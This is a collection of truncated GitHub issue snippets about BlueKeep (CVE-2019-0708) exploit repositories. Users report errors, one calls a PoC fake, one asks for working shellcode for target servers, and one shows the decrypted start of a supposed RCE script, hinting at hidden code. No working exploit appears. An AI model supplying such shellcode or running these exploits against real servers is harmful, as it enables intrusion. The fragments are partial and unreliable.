-
Just recently patched, I feel like this could be useful in a penetration test if they have outdated Windows servers.
-
Hello,
I have a problem with an untrusted certificate. When I clone certificat using pyrdp-cloner. There is no change. See photo.
![image](https://user-images.githubusercontent.com/9934287/646826…
-
patched windows server 2008 r2
kbKB2667402
then run crashexploit.py
the host is ok
so
this fake poc!!! is NOT CVE-2019-0708 POC
-
Hello,
First of all, thank you very much for this project, looks very useful !
I tried to test the module, by running a Get-PSTenablePlugin, but it seems that powershell cannot find the cmdlet I…
-
I'm a script kiddy has lots of dream. I'm from Lao.
I build and have one error here and other cve 2019-0708 PoC solutions too.
the error happen after tls.do_handshake()
error number (104, "ECONNRES…
ghost updated
5 years ago
-
Do you have any working shellcode to share?
simple code should be fine such as opening the cmd or notepad on the target server
-
Hi, I am having this issue, on my Ubuntu 18.10 x64 when i am trying your code
root@test:~/bluekeep_CVE-2019-0708_poc_to_exploit# python3 poc.py -i 192.168.0.15
Traceback (most recent call last):
…
-
[97m[92m
# Developed by Bitwis3
# CVE-2019-0708 BSOD & Checker
[93m[[9…
-
https://github.com/at0mik/CVE-2019-0708-RCE/blob/58e90e9df15ccb77074900c501da8b72ee8aace8/exp.py#L335
After decryption
------------------------------
import socket
import pwd
import os
import …
-
I am new to Python. I reviewed the code and everything looked like it would be fine to run. I was testing against a machine I thought was vulnerable still on my network but I wasn't seeing anything ha…